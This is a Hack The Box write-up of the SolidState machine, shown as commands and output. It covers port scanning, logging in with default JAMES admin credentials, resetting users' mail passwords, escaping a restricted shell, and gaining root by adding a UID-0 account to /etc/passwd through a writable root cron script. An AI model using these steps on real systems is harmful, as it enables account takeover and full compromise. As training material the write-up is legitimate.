Nmap
JAMES Remote Admin
Exploitation
Jail escape
Post exploitation
Enumeration
Pspy
Privilege escalation
Welcome to the SolidState writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
SolidState
tags: HTB
Medium
Linux
OSCP
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:35 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Nmap done: 1 IP address (1 host up) scanned in 76.06 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-23 18:39 CET
Nmap scan report for 10.10.10.51
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.7 [10.10.14.7]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 92.98 ms 10.10.14.1
2 93.12 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.34 seconds
JAMES Remote Admin
Googling we could find that the default credentials are root:root
and still working!
# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
Let's see what users there are.
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Exploitation
Well, we are going to change the password of all of them and read their emails.
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset
Let's add the accounts to Thunderbird
.
As we can see, John
has a message in his inbox.
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
And mindy
has two messages.
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
In this one, we can find a creds!
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
We are going to connect by SSH with these credentials.
# ssh mindy@10.10.10.51
mindy@10.10.10.51’s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
............................................................................
............................................................................
-rbash: $'\r': command not found
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names
mindy@solidstate:~$
Okay... we are jailed... Well let's get away 🤷🏻♂️
Jail escape
Running the command compgen -c
we can see what commands we have available.
We can execute cat
, give me the user's flag!
mindy@solidstate:~$ cat user.txt
CENSORED_FLAG
Trying to escape with SSH... Done!
# ssh mindy@10.10.10.51 -t "bash"
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
Post exploitation
Enumeration
Pspy
2021/03/23 15:54:01 CMD: UID=0 PID=14955 | /bin/sh -c python /opt/tmp.py
Wow! we can edit the script! Well, we are going to inject a user with root
privileges in the file/etc/passwd
.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
Privilege escalation
Okay, let's add our code to the script.
#!/usr/bin/env python
import os
import sys
passwd = open('/etc/passwd', 'r').readlines()
if not any('x4v1l0k' in s for s in passwd):
output = open('/etc/passwd', 'a')
output.write('x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash')
output.close()
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
2021/03/23 16:06:01 CMD: UID=0 PID=932 | /bin/sh -c python /opt/tmp.py
2021/03/23 16:06:01 CMD: UID=0 PID=933 | python /opt/tmp.py
Perfect, the script has been executed. We are going to check if the user has been injected and in that case to authenticate with it.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /etc/passwd | tail -n 1
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ su x4v1l0k
Password:
root@solidstate:/home/mindy# id
uid=0(root) gid=0(root) groups=0(root)
root@solidstate:/home/mindy# cat /root/root.txt
CENSORED_FLAG
That's all folks!